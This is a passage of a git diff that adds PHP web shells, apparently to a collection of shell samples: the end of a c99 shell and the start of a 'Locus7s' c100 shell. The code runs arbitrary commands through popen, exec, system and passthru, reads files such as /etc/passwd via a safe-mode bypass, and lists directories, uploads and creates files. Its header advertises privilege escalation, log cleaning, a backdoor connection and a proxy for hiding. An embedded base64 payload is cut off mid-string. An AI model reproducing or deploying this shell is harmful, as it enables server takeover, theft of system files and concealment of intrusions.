type=submit name=submit value="Execute"> + <br> + Warning. Kernel may be alerted using higher levels </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> + <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> + <input type="hidden" name="client" value="firefox-a"> + <input type="hidden" name="rls" value="org.mozilla:en-US:official"> + <input type="hidden" name="hl" value="en"> + <input type="hidden" name="hs" value="b7p"> + <input type=submit name="btnG" VALUE="Search"> + </form></center> + </td> +</tr></TABLE><br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Php Safe-Mode Bypass (Read Files) + </div><br> + <form action="<?php echo $surl; ?>"> + <div align="center"> + File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> + + + + + + + <? + + function rsg_read() + { + $test=""; + $temp=tempnam($test, "cx"); + $file=$_GET['file']; + $get=htmlspecialchars($file); + echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>"; + unlink($temp); + } else { + die("<FONT COLOR=\"RED\"><CENTER>Sorry... File + <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have + access.</CENTER></FONT>"); + } + echo "</div>"; + } + + if(isset($_GET['file'])) +{ +rsg_read(); +} + + ?> + + <? + + function rsg_glob() +{ +$chemin=$_GET['directory']; +$files = glob("$chemin*"); +echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; +foreach ($files as $filename) { + echo "<pre>"; + echo "$filename\n"; + echo "</pre>"; +} +} + +if(isset($_GET['directory'])) +{ +rsg_glob(); +} + +?> + + <br> + </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>"> + <div align="center"><br> + Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> + + </form></center> + </td> +</tr></TABLE> + + + + + + + + + + + + + + + + + + + + + + + + + + +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> PSych0 | <a href=""><font color="#FF0000">Cuz N0wH?R? iS s?cu? ?enough</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> +</body></html><?php chdir($lastdir); c99shexit(); ?> diff --git a/php/PHPshell/c99_locus7s/c99_locus7s.jpg b/php/PHPshell/c99_locus7s/c99_locus7s.jpg new file mode 100644 index 0000000..f3c9576 Binary files /dev/null and b/php/PHPshell/c99_locus7s/c99_locus7s.jpg differ diff --git a/php/PHPshell/c99_locus7s/c99_locus7s.php b/php/PHPshell/c99_locus7s/c99_locus7s.php new file mode 100644 index 0000000..cb3fe60 --- /dev/null +++ b/php/PHPshell/c99_locus7s/c99_locus7s.php @@ -0,0 +1,3595 @@ +<?php + +/****************************************************************************************** +* Locus7s Modified c100 Shell +* Beta v. 1.0a - Project x2300 +* Written by Captain Crunch Team +* Modified by Shadow & Preddy +* Re-Modified by #!physx^ (15.2.07) +*======================================================== +* New Modifications Implemented -- ++--------------------------------------------------------+ +* -Added link to Enumerate to escalate priviledges +* -Added Rootshell.c +* -Added Rootshell.c;auto-compiler +* -Execute Rootshell.c +* -Added Mig-Log Logcleaner +* -Execute Mig-Log Logcleaner +* -milw0rm searcher (Grabs OS and searches milw0rm) +* -Locus7s Style & Image +* -Added w4ck1ng Shell Backdoor Connect and Backdoor +* -Added PHP-Proxy link to hide your ass +* -Added your ip and server ip with whois capability +* -Added private 0day released by allahaka which utilizes the linux +* sudo bash to execute a stack overflow. +*======================================================== +* FEB. 14, 2007 RELEASE NOTES: ++--------------------------------------------------------+ +* PRIVATE RELEASE OF C100 SHELL FOR LOCUS7S MEMBERS +* FAILURE TO DO SO WILL RESULT IN LOSS OF VIP +* MEMBERS ACCESS, BAN FROM SITE, AND NO REFUND FOR VIP. +*======================================================== +* PRODUCT INFO: ++--------------------------------------------------------+ +* C100 SHELL CREATED BY CAPTAIN CRUNCH SECURITY TEAM +* WWW.CCTEAM.RU +* C100 SHELL - REVAMPED (X2300) MODIFIED BY LOCUS7S +* UNDERGROUND NETWORK | WWW.LOCUS7S.COM +* \E0T/ +*********************************************************/ + +//for php proxy purposes + +function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); } +$selfurl = base64_encode(selfURL()); +$phprox="http://twofaced.org/proxy/index.php?q=".$selfurl; + +//end of link + +//milw0rm search +$Lversion = php_uname(r); +$OSV = php_uname(s); +if(eregi("Linux",$OSV)) +{ +$Lversion=substr($Lversion,0,6); +$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion; +}else{ +$Lversion=substr($Lversion,0,3); +$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion; +} +//End of milw0rm search + + +//w4ck1ng Shell +if (!function_exists("myshellexec")) +{ +if(is_callable("popen")){ +function myshellexec($command) { +if (!($p=popen("($command)2>&1","r"))) { +return 126; +} +while (!feof($p)) { +$line=fgets($p,1000); +$out .= $line; +} +pclose($p); +return $out; +} +}else{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +} + +$proxy_shit="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